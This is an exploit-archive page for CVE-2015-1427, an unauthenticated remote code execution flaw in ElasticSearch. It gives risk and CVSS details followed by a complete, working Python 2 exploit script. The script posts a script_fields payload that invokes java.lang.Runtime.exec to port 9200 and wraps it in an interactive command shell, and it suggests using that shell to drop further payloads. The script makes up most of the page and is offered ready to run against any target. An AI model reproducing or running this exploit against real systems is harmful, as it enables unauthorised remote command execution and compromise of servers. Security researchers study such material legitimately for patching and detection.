ElasticSearch Unauthenticated Remote Code Execution

2015.03.12

Credit: Darren Martyn

Risk: High

Local: No

Remote: Yes

CVE: CVE-2015-1427

CWE: CWE-284

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

#!/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150309.1
# Licence: WTFPL - wtfpl.net
import json
import requests
import sys
import readline
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode vi')
__version__ = "20150309.1"
 
def banner():
    print """\x1b[1;32m
??????  ???    ???        ?????? ????????? ??? ??????    ??????  ??? ?? ??????  ???     ???   
??   ? ????   ??????    ???    ? ?  ??? ?????????? ??  ???    ? ???? ?????   ? ????    ????   
????   ????   ???  ???  ? ????   ? ???? ?????????    ? ? ????   ????????????   ????    ????   
???  ? ????   ?????????   ?   ???? ???? ? ???????? ????  ?   ?????? ??? ???  ? ????    ????   
?????????????????   ?????????????  ???? ? ????? ????? ?????????????????????????????????????????
?? ?? ?? ???  ???   ????? ??? ? ?  ? ??   ??  ? ?? ?  ?? ??? ? ? ? ??????? ?? ?? ???  ?? ???  ?
 ? ?  ?? ? ?  ? ?   ?? ?? ??  ? ?    ?     ? ?  ?  ?   ? ??  ? ? ? ??? ? ? ?  ?? ? ?  ?? ? ?  ?
   ?     ? ?    ?   ?   ?  ?  ?    ?       ? ??        ?  ?  ?   ?  ?? ?   ?     ? ?     ? ?  
   ?  ?    ?  ?     ?  ?      ?            ?  ? ?            ?   ?  ?  ?   ?  ?    ?  ?    ?  ?
                                              ?                                               
 Exploit for ElasticSearch , CVE-2015-1427   Version: %s\x1b[0m""" %(__version__)
 
def execute_command(target, command):
    payload = """{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"}}}""" %(command)
    try:
        url = "http://%s:9200/_search?pretty" %(target)
        r = requests.post(url=url, data=payload)
    except Exception, e:
        sys.exit("Exception Hit"+str(e))
    values = json.loads(r.text)
    fuckingjson = values['hits']['hits'][0]['fields']['lupin'][0]
    print fuckingjson.strip()
         
 
def exploit(target):
    print "{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something"
    while True:
        cmd = raw_input("~$ ")
        if cmd == "exit":
            sys.exit("{!} Shell exiting!")
        else:
            execute_command(target=target, command=cmd)
     
def main(args):
    banner()
    if len(args) != 2:
        sys.exit("Use: %s target" %(args[0]))
    exploit(target=args[1])
 
if __name__ == "__main__":
    main(args=sys.argv)

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ElasticSearch Unauthenticated Remote Code Execution

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.